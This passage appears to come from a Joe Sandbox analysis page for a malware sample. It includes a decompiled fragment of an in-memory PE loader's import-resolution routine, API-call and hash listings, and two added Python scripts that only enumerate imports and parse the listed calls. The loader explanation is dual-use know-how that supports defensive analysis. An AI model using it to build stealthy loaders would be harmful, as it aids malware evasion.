                                                                      										goto L24;
                                                                      									}
                                                                      									goto L17;
                                                                      								}
                                                                      							}
                                                                      							goto L24;
                                                                      						}
                                                                      					}
                                                                      					L24:
                                                                      				}
                                                                      				return _t75;
                                                                      			}
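The routine above has the shape of an in-memory PE loader's import-resolution step rather than anything specific to the CRT: it reads the import directory from the NT headers (+0x80/+0x84 is DataDirectory[1] of a PE32 image), probes each 0x14-byte IMAGE_IMPORT_DESCRIPTOR with IsBadReadPtr, stops at a descriptor whose Name is zero, loads the named module through a callback at +0x24, walks OriginalFirstThunk (falling back to FirstThunk when it is zero), treats a thunk with the sign bit set as an ordinal (low 16 bits) and otherwise as an RVA to IMAGE_IMPORT_BY_NAME whose string starts at +2, resolves each through the callback at +0x28 and writes the result back into the IAT. The error codes it sets are ERROR_MOD_NOT_FOUND (0x7e), ERROR_PROC_NOT_FOUND (0x7f) and ERROR_OUTOFMEMORY (0xe). The Python below is an added example, not code from this report or from the sample; it replays the same walk over a memory image (sections at their virtual addresses, as in the .sdmp the listing came from, so an RVA is a buffer offset) and lists what the image would import, which is what an analyst wants when deciding which loader stage a dumped image is. It only enumerates; it does not load or resolve anything. The PE32 image it parses is constructed inline as test data.

```python
"""Enumerate a PE32 memory image's imports the way the decompiled routine does.

Added example (not from the report or the sample).  Assumes a PE32 image mapped
at its virtual addresses, so every RVA is a direct offset into `image`.
"""
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000   # sign bit: thunk is an ordinal, not a name RVA
IMPORT_DESC_SIZE = 0x14             # sizeof(IMAGE_IMPORT_DESCRIPTOR), the stride in the listing


def _cstr(image: bytes, off: int) -> str:
    """Read a NUL-terminated ASCII string at `off`."""
    return image[off:image.index(b"\x00", off)].decode("ascii")


def walk_imports(image: bytes):
    """Return [(dll, [("name", hint, symbol) | ("ordinal", n), ...]), ...]."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20                       # Signature + IMAGE_FILE_HEADER
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled (the sample is 32-bit)")
    # DataDirectory[1] (imports) sits at OptionalHeader+0x68, i.e. NT headers +0x80/+0x84.
    imp_rva, imp_size = struct.unpack_from("<II", image, opt + 0x68)
    result = []
    if imp_size == 0:                             # the routine's first test: Size != 0
        return result
    desc = imp_rva
    while True:
        oft, _ts, _fwd, name_rva, ft = struct.unpack_from("<IIIII", image, desc)
        if name_rva == 0:                         # terminating descriptor (Name at desc+0xC)
            break
        dll = _cstr(image, name_rva)
        thunk = oft if oft else ft                # OriginalFirstThunk, else FirstThunk
        entries = []
        while True:
            val = struct.unpack_from("<I", image, thunk)[0]
            if val == 0:
                break
            if val & IMAGE_ORDINAL_FLAG32:        # import by ordinal
                entries.append(("ordinal", val & 0xFFFF))
            else:                                 # IMAGE_IMPORT_BY_NAME: WORD Hint; CHAR Name[]
                hint = struct.unpack_from("<H", image, val)[0]
                entries.append(("name", hint, _cstr(image, val + 2)))
            thunk += 4
        result.append((dll, entries))
        desc += IMPORT_DESC_SIZE
    return result


def build_sample_image() -> bytes:
    """Constructed test data: a minimal PE32 memory image with two import descriptors.

    kernel32.dll imports LoadLibraryA and GetProcAddress by name through
    OriginalFirstThunk; user32.dll has OriginalFirstThunk == 0 (exercising the
    FirstThunk fallback) and imports ordinal 500 plus MessageBoxA by name.
    """
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    nt = 0x80
    struct.pack_into("<I", img, 0x3C, nt)                                  # e_lfanew
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # FileHeader
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                                # PE32 magic
    struct.pack_into("<II", img, opt + 0x68, 0x200, 3 * IMPORT_DESC_SIZE)   # import dir
    # descriptors: (OFT, TimeDateStamp, ForwarderChain, Name, FT), then a zero terminator
    struct.pack_into("<IIIII", img, 0x200, 0x290, 0, 0, 0x240, 0x2A0)
    struct.pack_into("<IIIII", img, 0x214, 0x000, 0, 0, 0x250, 0x2B0)
    img[0x240:0x24D] = b"kernel32.dll\0"
    img[0x250:0x25B] = b"user32.dll\0"
    img[0x260:0x26F] = b"\x00\x00LoadLibraryA\0"                           # hint 0 + name
    img[0x270:0x281] = b"\x00\x00GetProcAddress\0"
    img[0x2C0:0x2CE] = b"\x02\x01MessageBoxA\0"                            # hint 0x102 + name
    struct.pack_into("<III", img, 0x290, 0x260, 0x270, 0)                  # kernel32 OFT
    struct.pack_into("<III", img, 0x2A0, 0x260, 0x270, 0)                  # kernel32 FT (unbound)
    struct.pack_into("<III", img, 0x2B0, IMAGE_ORDINAL_FLAG32 | 500, 0x2C0, 0)  # user32 FT
    return bytes(img)


if __name__ == "__main__":
    for dll, entries in walk_imports(build_sample_image()):
        print(dll)
        for entry in entries:
            print("   ", entry)
```

Run it against a dumped image (for instance the 0x400000 region this listing was taken from, read as raw bytes) instead of `build_sample_image()` to see which modules and symbols the loader stage would pull in; a payload that resolves its real imports this way typically shows a sparse static import table while the in-memory image resolved by this routine shows the full set.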

                                                                      0x0040f6e9
                                                                      0x0040f6ee
                                                                      0x0040f6f3
                                                                      0x0040f6f4
                                                                      0x0040f6f6
                                                                      0x0040f6f9
                                                                      0x0040f704
                                                                      0x0040f713
                                                                      0x0040f71e
                                                                      0x0040f724
                                                                      0x0040f727
                                                                      0x0040f727
                                                                      0x0040f727
                                                                      0x0040f72c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040f73b
                                                                      0x0040f741
                                                                      0x0040f811
                                                                      0x00000000
                                                                      0x0040f747
                                                                      0x0040f751
                                                                      0x0040f752
                                                                      0x0040f75c
                                                                      0x0040f760
                                                                      0x0040f806
                                                                      0x0040f811
                                                                      0x0040f811
                                                                      0x0040f817
                                                                      0x0040f766
                                                                      0x0040f769
                                                                      0x0040f76c
                                                                      0x0040f76f
                                                                      0x0040f772
                                                                      0x0040f777
                                                                      0x0040f779
                                                                      0x0040f779
                                                                      0x0040f77d
                                                                      0x0040f781
                                                                      0x0040f783
                                                                      0x0040f7bd
                                                                      0x0040f7c0
                                                                      0x0040f7c4
                                                                      0x0040f7c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040f787
                                                                      0x0040f789
                                                                      0x0040f78e
                                                                      0x0040f798
                                                                      0x0040f790
                                                                      0x0040f790
                                                                      0x0040f790
                                                                      0x0040f79c
                                                                      0x0040f79f
                                                                      0x0040f7a3
                                                                      0x0040f7a6
                                                                      0x0040f7a8
                                                                      0x0040f7ad
                                                                      0x0040f7cc
                                                                      0x0040f7af
                                                                      0x0040f7b3
Control-flow graph node addresses (rendered in the original as one address per line):
0x0040f7b7, 0x0040f7ba, 0x00000000, 0x0040f7ba, 0x0040f7ce, 0x0040f7d0, 0x0040f7f3, 0x0040f7fa, 0x0040f7d2, 0x0040f7d2, 0x0040f7db, 0x0040f7e1, 0x0040f7e7, 0x00000000, 0x00000000, 0x0040f7ed, 0x0040f7e7, 0x00000000, 0x0040f7d0, 0x00000000, 0x0040f7ca, 0x0040f760, 0x00000000, 0x0040f741, 0x0040f727, 0x0040f819, 0x0040f819, 0x0040f822

APIs
• IsBadReadPtr.KERNEL32(?,00000014,?,00000000,00000001,00000000,?,?,0040FA70), ref: 0040F716
• IsBadReadPtr.KERNEL32(?,00000014), ref: 0040F7DB
• SetLastError.KERNEL32(0000007F), ref: 0040F7FA
• SetLastError.KERNEL32(0000007E,0040FA70), ref: 0040F811
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
• Opcode ID: 41927517fe79c20d62399e2833468fb46731434c0eaf9f59769fbab8c422a671
• Instruction ID: 751db440692cd81c3dc0d8ee5a9cf1c65008f0e1f0839a977d1301680840af56
• Opcode Fuzzy Hash: 41927517fe79c20d62399e2833468fb46731434c0eaf9f59769fbab8c422a671
• Instruction Fuzzy Hash: 3F41AC762043019FD7249F28EC44B27B7E8FB84714F14843EE946DBB91E739E809CA5A
Uniqueness

Uniqueness Score: -1.00%
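The "APIs" bullets in each function record follow a fixed shape (`Api.MODULE(arg,arg,...), ref: ADDR`, with `?` for an argument the plugin could not recover). The added script below, written for this page and not part of Joe Sandbox or its IDA plugin, parses those lines into structured records and decodes the `SetLastError` arguments using winerror.h values: 0x7E is ERROR_MOD_NOT_FOUND and 0x7F is ERROR_PROC_NOT_FOUND. The page itself does not say what this function does, so the script only extracts what is on the page (probe size, planted error codes, call-site addresses); the sample lines are copied from the record above, and the error-code table is an assumption limited to the two codes that appear here.

```python
import re
from typing import Optional

# winerror.h values for the SetLastError arguments seen in this record.
# Assumption: only the two codes present on the page are mapped.
WIN32_ERRORS = {
    0x7E: "ERROR_MOD_NOT_FOUND",
    0x7F: "ERROR_PROC_NOT_FOUND",
}

# Constructed sample: the four "APIs" bullet lines of the record above, verbatim.
SAMPLE_API_LINES = """
• IsBadReadPtr.KERNEL32(?,00000014,?,00000000,00000001,00000000,?,?,0040FA70), ref: 0040F716
• IsBadReadPtr.KERNEL32(?,00000014), ref: 0040F7DB
• SetLastError.KERNEL32(0000007F), ref: 0040F7FA
• SetLastError.KERNEL32(0000007E,0040FA70), ref: 0040F811
""".strip().splitlines()

# One bullet line: optional "•", Api.MODULE(args), ", ref: " and a hex call-site address.
API_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_arg(tok: str) -> Optional[int]:
    """Arguments are 8-hex-digit values, or '?' when the plugin could not recover them."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)


def parse_api_line(line: str) -> dict:
    """Turn one 'APIs' bullet into {api, module, args, ref}; args keep None for '?'."""
    m = API_LINE_RE.match(line)
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    raw_args = m.group("args")
    args = [parse_arg(t) for t in raw_args.split(",")] if raw_args else []
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def decode_set_last_error(rec: dict) -> Optional[str]:
    """For SetLastError calls, name the error code being planted; None for other APIs."""
    if rec["api"] != "SetLastError" or not rec["args"] or rec["args"][0] is None:
        return None
    code = rec["args"][0]
    return WIN32_ERRORS.get(code, f"UNKNOWN_0x{code:X}")


def summarize(lines) -> dict:
    """Parse all bullets and pull out the facts an analyst checks first:
    the IsBadReadPtr probe sizes, the error codes planted, and the call sites."""
    recs = [parse_api_line(ln) for ln in lines]
    probes = [r for r in recs if r["api"] == "IsBadReadPtr"]
    sizes = {r["args"][1] for r in probes if len(r["args"]) > 1 and r["args"][1] is not None}
    return {
        "records": recs,
        "probe_sizes": sorted(sizes),
        "errors_set": [e for e in (decode_set_last_error(r) for r in recs) if e],
        "refs": [r["ref"] for r in recs],
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_API_LINES)
    print("probe sizes:", [hex(x) for x in s["probe_sizes"]])
    print("errors planted:", s["errors_set"])
    print("call sites:", [hex(x) for x in s["refs"]])
```

Both probes check a 0x14-byte (20-byte) region, and the two planted codes are the pair that module and procedure lookups report on failure; whether this function is in fact a lookup helper is for the analyst to confirm in the disassembly, since the record does not say.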